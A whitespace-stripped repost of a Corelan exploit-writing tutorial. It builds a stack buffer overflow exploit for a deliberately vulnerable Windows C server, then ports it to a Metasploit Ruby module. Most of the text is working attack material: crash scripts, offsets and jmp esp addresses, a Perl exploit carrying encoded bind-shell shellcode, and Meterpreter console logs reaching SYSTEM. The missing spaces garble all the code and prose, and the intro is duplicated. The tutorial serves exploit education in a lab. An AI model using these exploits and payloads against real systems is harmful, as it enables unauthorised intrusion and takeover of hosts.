Exploit writing tutorial part 4 : From Exploit to Metasploit – The basics
2011-11-01 12:19
507 查看
Inthefirstpartsoftheexploitwritingtutorial,Ihavediscussedsomecommonvulnerabilitiesthatcanleadto2typesofexploits:stackbasedbufferoverflows(withdirectEIPoverwrite),andstackbasedbufferoverflowsthattakeadvantageofSEH
chains.Inmyexamples,Ihaveusedperltodemonstratehowtobuildaworkingexploit.
Obviously,writingexploitsisnotlimitedtoperlonly.Iguesseveryprogramminglanguagecouldbeusedtowriteexploits…soyoucanjustpicktheonethatyouaremostfamiliarwith.(python,c,c++,C#,etc)
Despitethefactthatthesecustomwrittenexploitswillworkjustfine,itmaybenicetobeabletoincludeyourownexploitsinthemetasploitframeworkinordertotakeadvantageofsomeoftheuniquemetasploitfeatures.
Sotoday,I’mgoingtoexplainhowexploitscanbewrittenasametasploitmodule.
Metasploitmodulesarewrittinginruby.Evenifyoudon’tknowalotaboutruby,youshouldstillbeabletowriteametasploitexploitmodulebasedonthistutorialandtheexistingexploitsavailableinmetasploit.
headerandsomedependencies
Somecommentsabouttheexploitmodule
require‘msf/core’
classdefinition
includes
“def”definitions:
initialize
check(optional)
exploit
Youcanputcommentsinyourmetasploitmodulebyusingthe#character.That’sallweneedtoknowfornow,let’slookatthestepstobuildametasploitexploitmodule.
CompilethecodeandrunitonaWindows2003serverR2withSP2.(Ihaveusedlcc-win32tocompilethecode)
Whenyousend1000bytestotheserver,theserverwillcrash.
Thefollowingperlscriptdemonstratesthecrash:
Thevulnerableserverdies,andEIPgetsoverwrittenwithA’s
Usingametasploitpattern,wedeterminethattheoffsettoEIPoverwriteisat504bytes.Sowe’llbuildanewcrashscripttoverifytheoffsetandseethecontentsoftheregisterswhentheoverflowoccurs:
Aftersending504A’s,4B’sandabunchofC’s,wecanseethefollowingregisterandstackcontents:
Increasethejunksizetoseehowmuchspaceyouhaveavailableforyourshellcode.Thisisimportantbecauseyouwillneedtospecifythisparameterinthemetasploitmodule.
Changethe$totalbuffervalueto2000,overflowstillworksasexpected,andthecontentsofespindicatethatwehavebeenabletofillmemorywithC’suptoesp+5d3(1491bytes).Thatwillbeourshellcodespace(moreorless)
AllweneedistooverwriteEIPwithjmpesp(orcallesp,orsomethingsimilar),andputourshellcodeinsteadoftheC’sandweshouldbefine.
Usingfindjmp,wehavefoundaworkingaddressforourWindows2003R2SP2server:
Afterdoingsometestswithshellcode,wecanusethefollowingconclusionstobuildthefinalexploits
exclude0xfffromtheshellcode
putsomenop’sbeforetheshellcode
Ourfinalexploit(inperl,withashellboundtotcp5555)lookslikethis:
Exploitoutput:
Themostimportantparametersthatcanbetakenfromthisexploitare
offsettoret(eipoverwrite)is504
windows2003R2SP2(English)jumpaddressis0x71C02B67
shellcodeshouldnotcontain0×00or0xff
shellcodecanbemoreorless1400bytes
Futhermore,afterrunningthesametestsagainstaWindowsXPSP3(English),wedeterminethattheoffsetisthesame,butthejmpaddressmustbechanged(toforexample0x7C874413).We’llbuildametasploitmodulethatwillallowyoutoselectoneof
these2targets,andwillusethecorrectjmpaddress.
underthewindowsftpserverexploits.
Metasploitmodulesaresavedintheframework3xxfolderstructure,under/modules/exploits.Inthatfolder,theexploitsarebrokendownintooperatingsystemsfirst,andthenservices.
Ourserverrunsonwindows,sowe’llputitunderwindows.Thewindowsfodlercontainsanumberoffoldersalready(fromantivirustowins),includea“misc”folder.We’llputourexploitunder“misc”(orwecouldputitundertelnet)becauseitdoesnot
reallybelongtoanyoftheothertypes.
We’llcreateourmetasploitmoduleunder%metasploit%/modules/windows/misc:
Weseethefollowingcomponents:
first,put“requiremsf/core”,whichwillbevalidforallmetasploitexploits
definetheclass.Inourcase,itisaremoteexploit.
Next,setexploitinformationandexploitdefinitions:
include:inourcase,itisaplaintcpconnection,soweuseMsf::Exploit::Remote::Tcp
Metasploithashandlersforhttp,ftp,etc…(whichwillhelpyoubuildingexploitsfasterbecauseyoudon’thavetowritetheentireconversationyourself)
Information:
Payload:definethelengthandbadchars(0×00and0xffinourcase)
Definethetargets,anddefinetarget-specificsettingssuchasreturnaddress,offset,etc
Exploit
connect(whichwillsetuptheconnectiontotheremoteport)
buildthebuffer
junk(nops,withsizeofoffset)
addthereturnaddress,morenops,andthentheencodedpayload
writethebuffertotheconnection
handletheexploit
disconnect
That’sit
Nowopenmsfconsole.Ifthereisanerrorinyourscript,youwillseeinformationabouttheerrorwhilemsfconsoleloads.Ifmsfconsolewasalreadyloaded,you’llhavetocloseitagainbeforeyoucanusethisnewmodule(orbeforeyoucanuseupdated
moduleifyouhavemadeachange)
http://www.metasploit.com/documents/api/msfcore/index.html
Nowgooutandbuildyourownexploits,putsomel33ttalkintheexploitanddon’tforgettosendyourgreetingstocorelanc0d3r:-)
©2009–2010,CorelanTeam(corelanc0d3r).Allrightsreserved.
chains.Inmyexamples,Ihaveusedperltodemonstratehowtobuildaworkingexploit.
Obviously,writingexploitsisnotlimitedtoperlonly.Iguesseveryprogramminglanguagecouldbeusedtowriteexploits…soyoucanjustpicktheonethatyouaremostfamiliarwith.(python,c,c++,C#,etc)
Despitethefactthatthesecustomwrittenexploitswillworkjustfine,itmaybenicetobeabletoincludeyourownexploitsinthemetasploitframeworkinordertotakeadvantageofsomeoftheuniquemetasploitfeatures.
Sotoday,I’mgoingtoexplainhowexploitscanbewrittenasametasploitmodule.
Metasploitmodulesarewrittinginruby.Evenifyoudon’tknowalotaboutruby,youshouldstillbeabletowriteametasploitexploitmodulebasedonthistutorialandtheexistingexploitsavailableinmetasploit.
Metasploitexploitmodulestructure
Atypicalmetasploitexploitmoduleconsistsofthefollowingcomponents:headerandsomedependencies
Somecommentsabouttheexploitmodule
require‘msf/core’
classdefinition
includes
“def”definitions:
initialize
check(optional)
exploit
Youcanputcommentsinyourmetasploitmodulebyusingthe#character.That’sallweneedtoknowfornow,let’slookatthestepstobuildametasploitexploitmodule.
Casestudy:buildinganexploitforasimplevulnerableserver
We’llusethefollowingvulnerableservercode(C)todemonstratethebuildingprocess:#include<iostream.h> #include<winsock.h> #include<windows.h> //loadwindowssocket #pragmacomment(lib,"wsock32.lib") //DefineReturnMessages #defineSS_ERROR1 #defineSS_OK0 voidpr(char*str) { charbuf[500]=""; strcpy(buf,str); } voidsError(char*str) { MessageBox(NULL,str,"socketError",MB_OK); WSACleanup(); } intmain(intargc,char**argv) { WORDsockVersion; WSADATAwsaData; intrVal; charMessage[5000]=""; charbuf[2000]=""; u_shortLocalPort; LocalPort=200; //wsock32initializedforusage sockVersion=MAKEWORD(1,1); WSAStartup(sockVersion,&wsaData); //createserversocket SOCKETserverSocket=socket(AF_INET,SOCK_STREAM,0); if(serverSocket==INVALID_SOCKET) { sError("Failedsocket()"); returnSS_ERROR; } SOCKADDR_INsin; sin.sin_family=PF_INET; sin.sin_port=htons(LocalPort); sin.sin_addr.s_addr=INADDR_ANY; //bindthesocket rVal=bind(serverSocket,(LPSOCKADDR)&sin,sizeof(sin)); if(rVal==SOCKET_ERROR) { sError("Failedbind()"); WSACleanup(); returnSS_ERROR; } //getsockettolisten rVal=listen(serverSocket,10); if(rVal==SOCKET_ERROR) { sError("Failedlisten()"); WSACleanup(); returnSS_ERROR; } //waitforaclienttoconnect SOCKETclientSocket; clientSocket=accept(serverSocket,NULL,NULL); if(clientSocket==INVALID_SOCKET) { sError("Failedaccept()"); WSACleanup(); returnSS_ERROR; } intbytesRecv=SOCKET_ERROR; while(bytesRecv==SOCKET_ERROR) { //receivethedatathatisbeingsentbytheclientmaxlimitto5000bytes. bytesRecv=recv(clientSocket,Message,5000,0); if(bytesRecv==0||bytesRecv==WSAECONNRESET) { printf("\nConnectionClosed.\n"); break; } } //Passthedatareceivedtothefunctionpr pr(Message); //closeclientsocket closesocket(clientSocket); //closeserversocket closesocket(serverSocket); WSACleanup(); returnSS_OK; }
CompilethecodeandrunitonaWindows2003serverR2withSP2.(Ihaveusedlcc-win32tocompilethecode)
Whenyousend1000bytestotheserver,theserverwillcrash.
Thefollowingperlscriptdemonstratesthecrash:
usestrict;
useSocket;
my$junk="\x41"x1000;
#initializehostandport
my$host=shift||'localhost';
my$port=shift||200;
my$proto=getprotobyname('tcp');
#gettheportaddress
my$iaddr=inet_aton($host);
my$paddr=sockaddr_in($port,$iaddr);
print"[+]Settingupsocket\n";
#createthesocket,connecttotheport
socket(SOCKET,PF_INET,SOCK_STREAM,$proto)ordie"socket:$!";
print"[+]Connectingto$hostonport$port\n";
connect(SOCKET,$paddr)ordie"connect:$!";
print"[+]Sendingpayload\n";
printSOCKET$junk."\n";
print"[+]Payloadsent\n";
closeSOCKETordie"close:$!";
Thevulnerableserverdies,andEIPgetsoverwrittenwithA’s
0:001>g
(e00.de0):Accessviolation-codec0000005(firstchance)
Firstchanceexceptionsarereportedbeforeanyexceptionhandling.
Thisexceptionmaybeexpectedandhandled.
eax=0012e05cebx=7ffd6000ecx=00000000edx=0012e446esi=0040bdecedi=0012ebe0
eip=41414141esp=0012e258ebp=41414141iopl=0nvupeiplnzacponc
cs=001bss=0023ds=0023es=0023fs=003bgs=0000efl=00010212
41414141?????
Usingametasploitpattern,wedeterminethattheoffsettoEIPoverwriteisat504bytes.Sowe’llbuildanewcrashscripttoverifytheoffsetandseethecontentsoftheregisterswhentheoverflowoccurs:
usestrict;
useSocket;
my$totalbuffer=1000;
my$junk="\x41"x504;
my$eipoverwrite="\x42"x4;
my$junk2="\x43"x($totalbuffer-length($junk.$eipoverwrite));
#initializehostandport
my$host=shift||'localhost';
my$port=shift||200;
my$proto=getprotobyname('tcp');
#gettheportaddress
my$iaddr=inet_aton($host);
my$paddr=sockaddr_in($port,$iaddr);
print"[+]Settingupsocket\n";
#createthesocket,connecttotheport
socket(SOCKET,PF_INET,SOCK_STREAM,$proto)ordie"socket:$!";
print"[+]Connectingto$hostonport$port\n";
connect(SOCKET,$paddr)ordie"connect:$!";
print"[+]Sendingpayload\n";
printSOCKET$junk.$eipoverwrite.$junk2."\n";
print"[+]Payloadsent\n";
closeSOCKETordie"close:$!";
Aftersending504A’s,4B’sandabunchofC’s,wecanseethefollowingregisterandstackcontents:
0:001>g
(ed0.eb0):Accessviolation-codec0000005(firstchance)
Firstchanceexceptionsarereportedbeforeanyexceptionhandling.
Thisexceptionmaybeexpectedandhandled.
eax=0012e05cebx=7ffde000ecx=00000000edx=0012e446esi=0040bdecedi=0012ebe0
eip=42424242esp=0012e258ebp=41414141iopl=0nvupeiplnzacponc
cs=001bss=0023ds=0023es=0023fs=003bgs=0000efl=00010212
42424242?????
0:000>desp
0012e2584343434343434343-4343434343434343CCCCCCCCCCCCCCCC
0012e2684343434343434343-4343434343434343CCCCCCCCCCCCCCCC
0012e2784343434343434343-4343434343434343CCCCCCCCCCCCCCCC
0012e2884343434343434343-4343434343434343CCCCCCCCCCCCCCCC
0012e2984343434343434343-4343434343434343CCCCCCCCCCCCCCCC
0012e2a84343434343434343-4343434343434343CCCCCCCCCCCCCCCC
0012e2b84343434343434343-4343434343434343CCCCCCCCCCCCCCCC
0012e2c84343434343434343-4343434343434343CCCCCCCCCCCCCCCC
Increasethejunksizetoseehowmuchspaceyouhaveavailableforyourshellcode.Thisisimportantbecauseyouwillneedtospecifythisparameterinthemetasploitmodule.
Changethe$totalbuffervalueto2000,overflowstillworksasexpected,andthecontentsofespindicatethatwehavebeenabletofillmemorywithC’suptoesp+5d3(1491bytes).Thatwillbeourshellcodespace(moreorless)
AllweneedistooverwriteEIPwithjmpesp(orcallesp,orsomethingsimilar),andputourshellcodeinsteadoftheC’sandweshouldbefine.
Usingfindjmp,wehavefoundaworkingaddressforourWindows2003R2SP2server:
findjmp.exews2_32.dllesp
Reg:esp
Scanningws2_32.dllforcodeusablewiththeespregister
0x71C02B67pushesp-ret
FinishedScanningws2_32.dllforcodeusablewiththeespregister
Found1usableaddresses
Afterdoingsometestswithshellcode,wecanusethefollowingconclusionstobuildthefinalexploits
exclude0xfffromtheshellcode
putsomenop’sbeforetheshellcode
Ourfinalexploit(inperl,withashellboundtotcp5555)lookslikethis:
#
print"--------------------------------------\n";
print"WritingBufferOverflows\n";
print"PeterVanEeckhoutte\n";
print"http://www.corelan.be:8800\n";print"--------------------------------------\n";
print"Exploitforvulnserver.c\n";
print"--------------------------------------\n";
usestrict;
useSocket;
my$junk="\x90"x504;
#jmpesp(fromws2_32.dll)
my$eipoverwrite=pack('V',0x71C02B67);
#addsomeNOP's
my$shellcode="\x90"x50;
#windows/shell_bind_tcp-702bytes
#http://www.metasploit.com#Encoder:x86/alpha_upper
#EXITFUNC=seh,LPORT=5555,RHOST=
$shellcode=$shellcode."\x89\xe0\xd9\xd0\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x43".
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58".
"\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42".
"\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30".
"\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42\x4a".
"\x4a\x4b\x50\x4d\x4d\x38\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f".
"\x45\x30\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47\x35".
"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x45\x51\x4a\x4f".
"\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x43\x31".
"\x4a\x4b\x47\x39\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e".
"\x50\x31\x49\x50\x4a\x39\x4e\x4c\x4c\x44\x49\x50\x42\x54".
"\x45\x57\x49\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b".
"\x4c\x34\x47\x4b\x46\x34\x46\x44\x51\x38\x42\x55\x4a\x45".
"\x4c\x4b\x51\x4f\x51\x34\x43\x31\x4a\x4b\x43\x56\x4c\x4b".
"\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b".
"\x44\x43\x46\x4c\x4c\x4b\x4b\x39\x42\x4c\x51\x34\x45\x4c".
"\x45\x31\x49\x53\x46\x51\x49\x4b\x43\x54\x4c\x4b\x51\x53".
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c".
"\x4e\x4d\x4c\x4b\x51\x50\x44\x48\x51\x4e\x43\x58\x4c\x4e".
"\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f\x4e\x36\x45\x36".
"\x51\x43\x42\x46\x43\x58\x46\x53\x47\x42\x45\x38\x43\x47".
"\x44\x33\x46\x52\x51\x4f\x46\x34\x4b\x4f\x48\x50\x42\x48".
"\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48\x56".
"\x51\x4f\x4c\x49\x4d\x35\x43\x56\x4b\x31\x4a\x4d\x45\x58".
"\x44\x42\x46\x35\x43\x5a\x43\x32\x4b\x4f\x4e\x30\x45\x38".
"\x48\x59\x45\x59\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56".
"\x51\x43\x50\x53\x50\x53\x46\x33\x46\x33\x51\x53\x50\x53".
"\x47\x33\x46\x33\x4b\x4f\x4e\x30\x42\x46\x42\x48\x42\x35".
"\x4e\x53\x45\x36\x50\x53\x4b\x39\x4b\x51\x4c\x55\x43\x58".
"\x4e\x44\x45\x4a\x44\x30\x49\x57\x46\x37\x4b\x4f\x4e\x36".
"\x42\x4a\x44\x50\x50\x51\x50\x55\x4b\x4f\x48\x50\x45\x38".
"\x49\x34\x4e\x4d\x46\x4e\x4a\x49\x50\x57\x4b\x4f\x49\x46".
"\x46\x33\x50\x55\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x51\x59".
"\x4c\x46\x51\x59\x51\x47\x4b\x4f\x49\x46\x46\x30\x50\x54".
"\x46\x34\x50\x55\x4b\x4f\x48\x50\x4a\x33\x43\x58\x4b\x57".
"\x43\x49\x48\x46\x44\x39\x51\x47\x4b\x4f\x4e\x36\x46\x35".
"\x4b\x4f\x48\x50\x43\x56\x43\x5a\x45\x34\x42\x46\x45\x38".
"\x43\x53\x42\x4d\x4b\x39\x4a\x45\x42\x4a\x50\x50\x50\x59".
"\x47\x59\x48\x4c\x4b\x39\x4d\x37\x42\x4a\x47\x34\x4c\x49".
"\x4b\x52\x46\x51\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x47\x32".
"\x46\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a".
"\x46\x58\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x43\x42\x4b\x4e".
"\x48\x33\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56".
"\x51\x4b\x46\x37\x50\x52\x50\x51\x50\x51\x50\x51\x43\x5a".
"\x45\x51\x46\x31\x50\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30".
"\x43\x58\x4e\x4d\x49\x49\x44\x45\x48\x4e\x46\x33\x4b\x4f".
"\x48\x56\x43\x5a\x4b\x4f\x4b\x4f\x50\x37\x4b\x4f\x4e\x30".
"\x4c\x4b\x51\x47\x4b\x4c\x4b\x33\x49\x54\x42\x44\x4b\x4f".
"\x48\x56\x51\x42\x4b\x4f\x48\x50\x43\x58\x4a\x50\x4c\x4a".
"\x43\x34\x51\x4f\x50\x53\x4b\x4f\x4e\x36\x4b\x4f\x48\x50".
"\x41\x41";
#initializehostandport
my$host=shift||'localhost';
my$port=shift||200;
my$proto=getprotobyname('tcp');
#gettheportaddress
my$iaddr=inet_aton($host);
my$paddr=sockaddr_in($port,$iaddr);
print"[+]Settingupsocket\n";
#createthesocket,connecttotheport
socket(SOCKET,PF_INET,SOCK_STREAM,$proto)ordie"socket:$!";
print"[+]Connectingto$hostonport$port\n";
connect(SOCKET,$paddr)ordie"connect:$!";
print"[+]Sendingpayload\n";
printSOCKET$junk.$eipoverwrite.$shellcode."\n";
print"[+]Payloadsent\n";
print"[+]Attemptingtotelnetto$hostonport5555...\n";
system("telnet$host5555");
closeSOCKETordie"close:$!";
Exploitoutput:
root@backtrack4:/tmp#perlsploit.pl192.168.24.3200
--------------------------------------
WritingBufferOverflows
PeterVanEeckhouttehttp://www.corelan.be:8800--------------------------------------
Exploitforvulnserver.c
--------------------------------------
[+]Settingupsocket
[+]Connectingto192.168.24.3onport200
[+]Sendingpayload
[+]Payloadsent
[+]Attemptingtotelnetto192.168.24.3onport5555...
Trying192.168.24.3...
Connectedto192.168.24.3.
Escapecharacteris'^]'.
MicrosoftWindows[Version5.2.3790]
(C)Copyright1985-2003MicrosoftCorp.
C:\vulnserver\lcc>whoami
whoami
win2003-01\administrator
Themostimportantparametersthatcanbetakenfromthisexploitare
offsettoret(eipoverwrite)is504
windows2003R2SP2(English)jumpaddressis0x71C02B67
shellcodeshouldnotcontain0×00or0xff
shellcodecanbemoreorless1400bytes
Futhermore,afterrunningthesametestsagainstaWindowsXPSP3(English),wedeterminethattheoffsetisthesame,butthejmpaddressmustbechanged(toforexample0x7C874413).We’llbuildametasploitmodulethatwillallowyoutoselectoneof
these2targets,andwillusethecorrectjmpaddress.
Convertingtheexploittometasploit
First,youneedtodeterminewhattypeyourexploitwillbe,becausethatwilldeterminetheplacewithinthemetasploitfolderstructurewheretheexploitwillbesaved.Ifyourexploitistargettingawindowsbasedftpserver,itwouldneedtobeplacedunderthewindowsftpserverexploits.
Metasploitmodulesaresavedintheframework3xxfolderstructure,under/modules/exploits.Inthatfolder,theexploitsarebrokendownintooperatingsystemsfirst,andthenservices.
Ourserverrunsonwindows,sowe’llputitunderwindows.Thewindowsfodlercontainsanumberoffoldersalready(fromantivirustowins),includea“misc”folder.We’llputourexploitunder“misc”(orwecouldputitundertelnet)becauseitdoesnot
reallybelongtoanyoftheothertypes.
We’llcreateourmetasploitmoduleunder%metasploit%/modules/windows/misc:
root@backtrack4:/#cd/pentest/exploits/framework3/modules/exploits/windows/misc
root@backtrack4:/pentest/exploits/framework3/modules/exploits/windows/misc#vicustom_vulnserver.rb
#
#
#Custommetasploitexploitforvulnserver.c
#WrittenbyPeterVanEeckhoutte
#
#
require'msf/core'
classMetasploit3<Msf::Exploit::Remote
includeMsf::Exploit::Remote::Tcp
definitialize(info={})
super(update_info(info,
'Name'=>'Customvulnerableserverstackoverflow',
'Description'=>%q{
Thismoduleexploitsastackoverflowina
customvulnerableserver.
},
'Author'=>['PeterVanEeckhoutte'],
'Version'=>'$Revision:9999$',
'DefaultOptions'=>
{
'EXITFUNC'=>'process',
},
'Payload'=>
{
'Space'=>1400,
'BadChars'=>"\x00\xff",
},
'Platform'=>'win',
'Targets'=>
[
['WindowsXPSP3En',
{'Ret'=>0x7c874413,'Offset'=>504}],
['Windows2003ServerR2SP2',
{'Ret'=>0x71c02b67,'Offset'=>504}],
],
'DefaultTarget'=>0,
'Privileged'=>false
))
register_options(
[
Opt::RPORT(200)
],self.class)
end
defexploit
connect
junk=make_nops(target['Offset'])
sploit=junk+[target.ret].pack('V')+make_nops(50)+payload.encoded
sock.put(sploit)
handler
disconnect
end
end
Weseethefollowingcomponents:
first,put“requiremsf/core”,whichwillbevalidforallmetasploitexploits
definetheclass.Inourcase,itisaremoteexploit.
Next,setexploitinformationandexploitdefinitions:
include:inourcase,itisaplaintcpconnection,soweuseMsf::Exploit::Remote::Tcp
Metasploithashandlersforhttp,ftp,etc…(whichwillhelpyoubuildingexploitsfasterbecauseyoudon’thavetowritetheentireconversationyourself)
Information:
Payload:definethelengthandbadchars(0×00and0xffinourcase)
Definethetargets,anddefinetarget-specificsettingssuchasreturnaddress,offset,etc
Exploit
connect(whichwillsetuptheconnectiontotheremoteport)
buildthebuffer
junk(nops,withsizeofoffset)
addthereturnaddress,morenops,andthentheencodedpayload
writethebuffertotheconnection
handletheexploit
disconnect
That’sit
Nowopenmsfconsole.Ifthereisanerrorinyourscript,youwillseeinformationabouttheerrorwhilemsfconsoleloads.Ifmsfconsolewasalreadyloaded,you’llhavetocloseitagainbeforeyoucanusethisnewmodule(orbeforeyoucanuseupdated
moduleifyouhavemadeachange)
Testtheexploit
Test1:WindowsXPSP3
root@backtrack4:/pentest/exploits/framework3#./msfconsole
||_)|
__`__\_\__|_`|__|__\|_\|__|
|||__/|(|\__\|||(|||
_|_|_|\___|\__|\__,_|____/.__/_|\___/_|\__|
_|
=[msfv3.3-dev
+----=[395exploits-239payloads
+----=[20encoders-7nops
=[187aux
msf>usewindows/misc/custom_vulnserver
msfexploit(custom_vulnserver)>showoptionsModuleoptions:
NameCurrentSettingRequiredDescription
--------------------------------------
RHOSTyesThetargetaddress
RPORT200yesThetargetport
Exploittarget:
IdName
------
0WindowsXPSP3En
msfexploit(custom_vulnserver)>setrhost192.168.24.10
rhost=>192.168.24.10
msfexploit(custom_vulnserver)>showtargets
Exploittargets:
IdName
------
0WindowsXPSP3En
1Windows2003ServerR2SP2
msfexploit(custom_vulnserver)>settarget0
target=>0
msfexploit(custom_vulnserver)>setpayloadwindows/meterpreter/bind_tcp
payload=>windows/meterpreter/bind_tcp
msfexploit(custom_vulnserver)>showoptionsModuleoptions:
NameCurrentSettingRequiredDescription
--------------------------------------
RHOST192.168.24.10yesThetargetaddress
RPORT200yesThetargetport
Payloadoptions(windows/meterpreter/bind_tcp):
NameCurrentSettingRequiredDescription
--------------------------------------
EXITFUNCprocessyesExittechnique:seh,thread,process
LPORT4444yesThelocalport
RHOST192.168.24.10noThetargetaddress
Exploittarget:
IdName
------
0WindowsXPSP3En
msfexploit(custom_vulnserver)>exploit
[*]Startedbindhandler
[*]Transmittingintermediatestagerforover-sizedstage...(216bytes)
[*]Sendingstage(718336bytes)
[*]Meterpretersession1opened(192.168.24.1:42150->192.168.24.10:4444)
meterpreter>sysinfo
Computer:SPLOITBUILDER1
OS:WindowsXP(Build2600,ServicePack3).
Test2:Windows2003ServerR2SP2
(continuedfromexploittoXP):meterpreter>
meterpreter>quit
[*]Meterpretersession1closed.
msfexploit(custom_vulnserver)>setrhost192.168.24.3
rhost=>192.168.24.3
msfexploit(custom_vulnserver)>settarget1
target=>1
msfexploit(custom_vulnserver)>showoptionsModuleoptions:
NameCurrentSettingRequiredDescription
--------------------------------------
RHOST192.168.24.3yesThetargetaddress
RPORT200yesThetargetport
Payloadoptions(windows/meterpreter/bind_tcp):
NameCurrentSettingRequiredDescription
--------------------------------------
EXITFUNCprocessyesExittechnique:seh,thread,process
LPORT4444yesThelocalport
RHOST192.168.24.3noThetargetaddress
Exploittarget:
IdName
------
1Windows2003ServerR2SP2
msfexploit(custom_vulnserver)>exploit
[*]Startedbindhandler
[*]Transmittingintermediatestagerforover-sizedstage...(216bytes)
[*]Sendingstage(718336bytes)
[*]Meterpretersession2opened(192.168.24.1:56109->192.168.24.3:4444)
meterpreter>sysinfo
Computer:WIN2003-01
OS:Windows.NETServer(Build3790,ServicePack2).
meterpreter>getuid
Serverusername:WIN2003-01\Administrator
meterpreter>ps
Processlist
============
PIDNamePath
-----------
300smss.exe\SystemRoot\System32\smss.exe
372winlogon.exe\??\C:\WINDOWS\system32\winlogon.exe
396Explorer.EXEC:\WINDOWS\Explorer.EXE
420services.exeC:\WINDOWS\system32\services.exe
424ctfmon.exeC:\WINDOWS\system32\ctfmon.exe
432lsass.exeC:\WINDOWS\system32\lsass.exe
652svchost.exeC:\WINDOWS\system32\svchost.exe
832svchost.exeC:\WINDOWS\System32\svchost.exe
996spoolsv.exeC:\WINDOWS\system32\spoolsv.exe
1132svchost.exeC:\WINDOWS\System32\svchost.exe
1392dllhost.exeC:\WINDOWS\system32\dllhost.exe
1580svchost.exeC:\WINDOWS\System32\svchost.exe
1600svchost.exeC:\WINDOWS\System32\svchost.exe
2352cmd.exeC:\WINDOWS\system32\cmd.exe
2888vulnserver.exeC:\vulnserver\lcc\vulnserver.exe
meterpreter>migrate996
[*]Migratingto996...
[*]Migrationcompletedsuccessfully.
meterpreter>getuid
Serverusername:NTAUTHORITY\SYSTEM
pwned!
MoreinfoabouttheMetasploitAPI
YoucanfindmoreinformationabouttheMetasploitAPI(andavailableclasses)atNowgooutandbuildyourownexploits,putsomel33ttalkintheexploitanddon’tforgettosendyourgreetingstocorelanc0d3r:-)
©2009–2010,
相关文章推荐
- Exploit writing tutorial part 2 : Stack Based Overflows – jumping to shellcode
- Exploit writing tutorial part 7 : Unicode – from 0×00410041 to calc
- Nmap Cheat Sheet: From Discovery to Exploits – Part 1: Introduction to Nmap
- Exploit writing tutorial part 1 Stack Based Overflows
- Exploit writing tutorial part 5 : How debugger modules & plugins can speed up basic exploit developm
- Exploit writing tutorial part 6 : Bypassing Stack Cookies, SafeSeh, SEHOP, HW DEP and ASLR
- Exploit writing tutorial part 8 : Win32 Egg Hunting
- Exploit writing tutorial part 9 : Introduction to Win32 shellcoding
- Exploit writing tutorial part 10 : Chaining DEP with ROP – the Rubik’s[TM] Cube
- Exploit writing tutorial part 3b : SEH Based Exploits – just another example
- How to get part occurrences from usage link in ...
- COM组件开发实践(四)---From C++ to COM :Part 1
- exploit writing tutorial 阅读笔记总结
- COM组件开发实践(五)---From C++ to COM :Part 2
- Android Graphics Pipeline: From Button to Framebuffer (Part 1)
- How to fix: Recieve error "Unable to display this Web Part" on Data Views after restoring site from backup
- Reading from and Writing to a Socket
- ODBC from C Tutorial Part 1 --http://www.easysoft.com/developer/languages/c/odbc_tutorial.html
- COM组件开发实践(六)---From C++ to COM :Part 3